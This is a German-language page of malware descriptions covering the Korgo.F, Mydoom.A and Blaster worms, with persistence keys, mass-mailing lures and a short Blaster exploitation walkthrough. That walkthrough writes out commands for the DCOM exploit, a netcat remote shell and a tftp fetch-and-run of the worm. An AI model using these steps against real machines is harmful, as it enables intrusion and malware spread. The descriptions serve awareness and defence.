W32.Korgo.F
 

7. Er startet einen Thread, um die LSASS-Windows-Sicherheitslücke auf TCP-Port 445 (beschrieben im Microsoft Security Bulletin MS04-011) gegen beliebige IP-Adressen auszunutzen. Bei Erfolg versucht der entfernte Computer möglicherweise, eine Verbindung mit dem infizierten Computer herzustellen und den Wurm herunterzuladen.

W32.Mydoom.A@mm

Die Bedrohung die von diesem Wurm ausgeht wird als hoch bezeichnet.

Der Virus ist auch bekannt unter den Namen :

W32.Novarg.A@mm, W32/Mydoom@MM [McAfee], WORM_MIMAIL.R [Trend], Win32.Mydoom.A [Computer Associates], W32/Mydoom-A [Sophos], I-Worm.Novarg [Kaspersky]

Infektionslänge:

22.528 Byte. Die Größe der Wurmdatei variiert, wenn es sich um eine .zip-Datei handelt.

Bei Ausführung geht W32.Novarg.A@mm folgendermaßen vor:


Er erstellt die folgenden Dateien:

%System%\Shimgapi.dll. Die Datei Shimgapi.dll funktioniert wie ein Proxy-Server und öffnet die TCP-Ports im Bereich von 3127 bis 3198. Außerdem können über die Hintertür beliebige Dateien heruntergeladen und ausgeführt werden.
%Temp%\Message. Diese Datei ist gefüllt mit willkürlichen Buchstaben und wird in Notepad angezeigt.
%System%\Taskmon.exe.


--------------------------------------------------------------------------------
Hinweise:
Taskmon.exe ist eine legitime Datei in den Betriebssystemen Windows 95/98/Me, die dort jedoch im Ordner %Windir% und nicht im Ordner %System% gespeichert ist. (Standardmäßig ist dies das Verzeichnis C:\Windows oder C:\Winnt.) Sie sollten die legitime Datei im Ordner %Windir% nicht versehentlich löschen.
%System% ist eine Variable. Der Wurm findet den Ordner "System" und kopiert sich dorthin. Standardmäßig ist dies C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000) oder C:\Windows\System32 (Windows XP).
%Temp% ist eine Variable. Der Wurm findet den temporären Ordner und kopiert sich dorthin. Standardmäßig ist dies C:\Windows\TEMP (Windows 95/98/Me), C:\Winnt\Temp (Windows NT/2000) oder C:\Dokumente und Einstellungen\<Benutzername>\Lokale Einstellungen\Temp (Windows XP).

--------------------------------------------------------------------------------


Er fügt den Wert

"(Default)" = "%System%\shimgapi.dll"

dem folgenden Registrierungsschlüssel hinzu:

HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32

Dadurch wird die Datei Shimgapi.dll durch Explorer.exe geladen.


Der Wurm fügt den Wert

"TaskMon" = "%System%\taskmon.exe"

den folgenden Registrierungsschlüsseln hinzu:

HKEY_CURRENT_USER\Software\Microsft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Dadurch wird TaskMon beim Systemstart von Windows geladen.

Der Wurm überprüft das Systemdatum. Wenn das Datum zwischen dem 1. Februar 2004 und dem 12. Februar 2004 liegt, besteht eine Chance von 25 %, dass der Wurm einen DoS-Angriff auf www.sco.com durchführen wird. Der DoS-Angriff wird durchgeführt, indem der Wurm 63 Threads erstellt, die GET-Anfragen senden und eine direkte Verbindung zu Port 80 nutzen. Der Wurm versendet sich selbst nicht per Massen-Mail, wenn der DoS-Angriff gestartet wird.


--------------------------------------------------------------------------------
Hinweise:
Der Wurm wird am 1. Februar 2004 um 16:09:18 MEZ einen Denial-of-Service (DoS)-Angriff starten. Der Wurm überprüft das Systemdatum und die Systemzeit auf dem Computer, um festzustellen, ob der DoS-Angriff gestartet werden soll.
Aufgrund der zum Verifizieren des Systemdatums verwendeten Logik wird der DoS-Angriff nur auf 25 % der infizierten Computer ausgeführt.
Der DoS-Angriff tritt nur dann auf, wenn das Systemdatum während der ersten Infizierung überprüft wird oder wenn der Computer neu gestartet wird.
Der Wurm verwendet die lokalen DNS-Einstellungen, um den beim DoS-Angriff verwendeten Domänennamen (www.sco.com) aufzulösen.
--------------------------------------------------------------------------------


Er erstellt die folgenden Registrierungsschlüssel:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Explorer\ComDlg32\Version

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Explorer\ComDlg32\Version


Er durchsucht Dateien mit den folgenden Dateierweiterungen nach E-Mail-Adressen.

.htm
.sht
.php
.asp
.dbx
.tbb
.adb
.pl
.wab
.txt


Er versucht, E-Mails mit einer eigenen SMTP-Engine zu versenden. Der Wurm versucht, den Mail-Server des Empfängers zu ermitteln, bevor er die E-Mail versendet. Wenn dies nicht erfolgreich ist, verwendet er den lokalen Mail-Server.
Die E-Mail besitzt folgende Merkmale:

Von: Die Absenderadresse ist möglicherweise gefälscht.

Betreff: Die Betreffzeile kann eine der folgenden sein)
test
hi
hello
Mail Delivery System
Mail Transaction Failed
Server Report
Status
Error

Nachricht: Die Nachricht kann eine der folgenden sein
Mail transaction failed. Partial message is available.
The message contains Unicode characters and has been sent as a binary attachment.
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
test

Anhang: Der Name der angehängten Datei kann einer der folgenden sein (ohne die Dateierweiterung):
document
readme
doc
text
file
data
test
message
body

Die angehängte Datei kann zwei Erweiterungen haben. Ist dies der Fall, so ist die erste Dateierweiterung eine der folgenden:
.htm
.txt
.doc

Die zweite Dateierweiterung bzw. die einzige, wenn nur eine Erweiterung vorhanden ist, ist eine der folgenden:
.pif
.scr
.exe
.cmd
.bat
.zip (Dies ist eine tatsächliche .zip-Datei, die eine Kopie des Wurms mit demselben Dateinamen wie die .zip-Datei enthält. Die Datei readme.zip enthält z. B. eine Datei namens readme.pif.)

Wenn der Wurm die Erweiterung .exe oder .scr enthält, so sieht das angezeigte Symbol der Datei folgendermaßen aus:




Bei allen anderen Dateierweiterugen wird das entsprechende Symbol für den Dateityp verwendet.


Der Wurm kopiert sich als eine der folgenden Dateien in das KaZaA-Download-Verzeichnis:

winamp5
icq2004-final
activation_crack
strip-girl-2.0bdcom_patches
rootkitXP
office_crack
nuke2004

Dabei wird eine der folgenden Dateierweiterungen verwendet:
pif
scr
bat
exe
 

W32.Blaster.Worm

Durch eine Sicherheitslücke in den Microsoft Betriebssystemen

Windows 2000 und XP verbreitet sich ein der W32.Blaster.Worm.

Er ist so programmiert, dass er in der Nacht vom 15.8.2003 um 24.00h eine DOS-Attacke gegen den Microsoft Update Server durchführt.

Erst zu diesem Zeitpunkt kann ein genaues Urteil über die Verbreitung des Wurmes gefällt werden.

Zur Beseitigung empfehle ich das Tool Fix-Blast im Download Bereich.

Hintergrundwissen

Exploit Technik:

c:\> dcom32.exe <OS ver. & service pack> <Victim IP>

(ex. C:\> dcom32.exe 2 192.168.0.2)

c:> nc -vvv VicIP Port (ex. c:\>nc 192.168.0.2 4444

JackedXP [192.168.0.2] 4444 open Microsoft Windows XP [Version 5.1.2600] C:\WINDOWS\system32>)

Sie erhalten eine CMD Shell.

Mit

c:\tftp -i IP msblast.exe

wird nun der eigentliche Wurm installiert auf den Rechner kopiert

und mit

c:\msblast

ausgeführt.

Genau dieses Verfahren wird beim Wurm angewendet.

Danach wird ein DOS Angriff gegen den Microsoft Update Server eingerichtet.

Als letztes scannt der Wurm im lokalen Netzwerk nach offenen 135 Ports und nach Zufallssystem im öffentlichen Netz um sich weiterzuverteilen.

Die Gefahr für den PC würde ich als gering einschätzen,

jedoch die Art und Weise der Verbreitung als sehr gefährlich,

da viele Rechner noch nicht gegen die DCOM Verwundbarkeit den entsprechenden Patch von der Microsoft Seite eingespielt haben.